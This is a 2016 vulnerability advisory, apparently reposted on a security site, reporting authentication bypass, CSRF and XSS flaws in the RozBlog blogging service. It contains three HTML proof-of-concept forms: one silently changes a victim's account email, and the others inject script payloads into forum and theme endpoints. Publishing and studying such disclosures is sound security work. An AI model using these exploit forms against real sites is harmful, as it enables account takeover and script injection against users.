RozBlog Weblog Service Authentication Bypass / CSRF / CSS

2016.02.23
Credit: Ehsan Hosseini
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Document Title: =============== RozBlog Weblog Service - Authentication Bypass / Cross Site Request Forgery / Cross Site Scripting References (Source): ==================== http://ehsansec.ir/advisories/rozblog-xsrf-xss-bypass.txt Release Date: ============= 2016-02-23 Product & Service Introduction: =============================== Roseblog is one of the most famous blogging services, it has many special features that indicate you an interesting experience of blogging. Vulnerability Type: ========================= Authentication Bypass Cross Site Request Forgery Cross Site Scripting Vulnerability Details: ============================== I discovered an authentication bypass(change Email) vulnerability and a client-side cross site request forgery web vulnerability and a cross site scripting vulnerability and in RozBlog.com (Weblog Service). Exploitation Technique: ======================= Remote Severity Level: =============== Medium Proof of Concept (PoC): ======================= -- Cross Site Request Forgery & Authentication Bypass -- -- PoC 1 -- -- To edit the e-mail users must first enter the old password on other page, but with this exploit no longer requires it and bypass that. -- <html> <head> <title>Authentication Bypass - Csrf</title> </head> <body> <form action="http://news.rozblog.com/Edit_Profile" method="post"> <input type="text" name="email" value="hacker@mail.com" > <input type="text" name="name" value="Ehsan"> <input type="text" name="age" value="10"> <input type="text" name="site" value="http://ehsansec.ir/"> <input type="text" name="country" value="Country"> <input type="text" name="city" value="IRan"> <input type="text" name="about" value="About User"> <input type="text" name="yahoo" value="Yahoo Id"> <input type="text" name="password" value="123@abc"> <input type="submit" name="edit_profile" value="Attak"> </form> </body> </html> -- PoC 2 -- <html> <head> <title>XSS - Csrf</title> </head> <body onload="document.contactfrm.submit()"> <form action="http://news.rozblog.com/Forum/Send/Message/" name="contactfrm" method="post"> <input type="text" name="singer" value='"><img src=x onerror=alert(1)>'> <input type="text" name="subject" value='"><img src=x onerror=alert(2)>'> <input type="text" name="message" value='"></textarea><img src=x onerror=alert(3)>'> </form> </body> </html> -- PoC 3 -- -- Cross Site Scripting -- -- For action attribute enter address of weblog or one of rozblog.com domains -- <html> <head> <title>Cross Site Scripting</title> </head> <body onload="document.info.submit()"> <form action='http://rozblog.com/View_Temp' method='POST' name='info'> <input name="c" id="c" value="2" type="hidden"> <input name='themecode' value="<script>alert('Ehsan')</script>"> </form> </body> </html> Author: ================== Ehsan Hosseini http://ehsansec.ir/ SPX tnx to: =========== Bl4ck_mohajem Alireza Contact: ======== hehsan979@gmail.com info@ehsansec.ir

References:

http://ehsansec.ir/advisories/rozblog-xsrf-xss-bypass.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top